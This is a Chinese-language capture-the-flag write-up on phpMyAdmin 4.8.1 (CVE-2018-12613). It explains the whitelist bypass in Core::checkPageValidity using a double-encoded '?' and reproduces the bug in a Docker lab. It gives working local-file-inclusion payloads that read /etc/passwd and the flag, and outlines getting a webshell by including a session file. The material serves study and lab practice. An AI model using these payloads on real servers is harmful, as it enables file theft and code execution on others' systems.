打开题目看到的是乱码,想到可能是还有其他的路径,就用dirsearch扫一下
得到了/phpmyadmin/路径,加上题目是我有一个数据库,于是想到应该本题就是和phpmyadmin数据库有关
我们可以看到phpmyadmin的版本为4.8.1,搜索后发现这个版本的phpmyadmin存在漏洞CVE-2018-12613,下面我们复现一下漏洞。
首先分析一下源码:
index.php 关于target的部分
$target_blacklist = array (
'import.php', 'export.php'
); 设置黑名单,过滤'import.php', 'export.php'
&& is_string($_REQUEST['target']) 需要是字符串
&& ! preg_match('/^index/', $_REQUEST['target']) 不能以index开头
&& ! in_array($_REQUEST['target'], $target_blacklist) 黑名单
&& Core::checkPageValidity($_REQUEST['target']) 白名单过滤
Core::checkPageValidity方法位于libraries/classes/Core.php中443行,此函数作用为:
$whitelist 为空就引用申明的 $goto_whitelist;
$page 如果没有定义或者 $page 不为字符串就返回 false;
$page 如果存在在 $whitelist 中返回 true;
如果 $_page 存在在 $whitelist 中返回 true;
经过 urldecode 函数解码后的 $_page 存在在 $whitelist 中返回 true。
判断?前面的内容是否在白名单中,是则返回true。但是函数并没有对输入的参数做修改,截取的结果都保存在$_page中,所以target只需前面为白名单&%3F或者白名单%253F(?两次url编码)就可以绕过Core::checkPageValidity方法的白名单检测。
出现问题的代码:
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
在看看白名单
self::$goto_whitelist
所以可以在白名单?后面的参数进行操作
例如传入:?target=db_sql.php%253f
由于服务器会自动解码一次,所以在checkPageValidity()中,$page的值一开始会是db_sql%3f,又一次url解码后变成了db_sql.php?,这次便符合了?前内容在白名单的要求,函数返回true
但在index.php中$_REQUEST['target']仍然是db_sql%3f,而且会被include,通过目录穿越,就可造成任意文件包含
漏洞复现
首先用 vulhub去复现漏洞??? cd vulhub/phpmyadmin/CVE-2018-12613
利用docker-compose up -d 搭建环境
192.168.0.33:8080??target=db_sql.php%253f/../../../../../../../../etc/passwd
可见/etc/passwd被读取,说明文件包含漏洞存在
通过文件包含获取webshell
然后查看自己的sessionid(cookie中phpMyAdmin的值)
然后访问http://192.168.0.33:8080/?target=db_sql.php%253f/../../../../../../../../tmp/sess_9ddf5eb053ac119eb10c2838eb331f1b包含session文件即可
下面回到题目
可以用类似192.168.0.33:8080??target=db_sql.php%253f/../../../../../../../../etc/passwd的方法读取flag
payload:
phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../flag
?
?
?
?
